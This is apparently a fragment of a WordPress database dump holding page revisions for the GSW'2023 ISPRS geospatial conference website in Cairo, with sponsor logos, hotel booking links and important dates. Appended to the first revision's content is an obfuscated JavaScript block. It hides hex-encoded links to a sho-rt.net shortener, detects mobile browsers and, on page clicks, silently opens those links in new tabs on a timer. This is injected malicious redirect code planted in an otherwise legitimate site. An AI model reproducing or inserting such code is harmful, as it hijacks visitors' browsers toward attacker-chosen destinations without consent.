main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-13 20:57:20','2023-06-13 20:57:20','',3066,'https://gsw2023.com/?p=4681',0,'revision','',0),
(4682,1,'2023-06-13 20:59:04','2023-06-13 20:59:04','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#686868\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><strong>-Camera ready paper submission: July 15, 2023</strong></h5>\n</li>\n</ul>\n<h5 style=\"text-align: center;\"></h5>\n<ul style=\"text-align: center;\">\n<li style=\"text-align: left;\">\n<h5><strong>-Deadline for submission of travel grants                                           funded by </strong><strong style=\"text-align: center;\">The ISPRS Foundation is: June 16, 2023</strong></h5>\n</li>\n</ul>\n<h5 style=\"text-align: center;\"></h5>\n<ul>\n<li style=\"text-align: left;\">\n<h5><strong>-Early bird registration deadline: July 1, 2023</strong></h5>\n</li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" button_alignment=\"btn_center\" css=\".vc_custom_1686689514453{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" 